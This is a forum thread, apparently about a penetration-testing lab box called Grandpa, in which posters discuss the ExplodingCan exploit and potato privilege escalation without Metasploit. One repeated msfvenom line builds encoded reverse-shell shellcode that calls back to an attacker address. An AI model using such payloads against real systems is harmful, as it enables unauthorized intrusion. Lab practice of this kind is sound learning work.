Grandpa without Metasploit

Trying to do Grandpa without using Metasploit - OSCP style. Have a shell, I can move files to the server, but I cannot find an exploit.exe that works.

Suggestions?

I think I used the NSA exploit “explodingcan” via fuzzbunch on that one (maybe it was granny?), way back when.

You could give this a shot and change the payload to a cmd shell to avoid msf completely:

Interested to know if that script works actually.

Explodingcan is what got me into the box originally, but this gives networkservice permissions, but this is not enough to get either flag. It’s the privilege escalation that has me hung up.

Hmm, from memory I was dropped straight to a system shell using that exploit? Try a rotten or juicy potato if you have a service account:

Hey guys - what MSFVENOM command did you run for this? I couldn’t get explodingcan to work with this

msfvenom -p windows/shell_reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.X.X LPORT=4444 -o shellcode

@chppppp said:

Hey guys - what MSFVENOM command did you run for this? I couldn’t get explodingcan to work with this

msfvenom -p windows/shell_reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.X.X LPORT=4444 -o shellcode

That version of Explodingcan didn’t work for me either.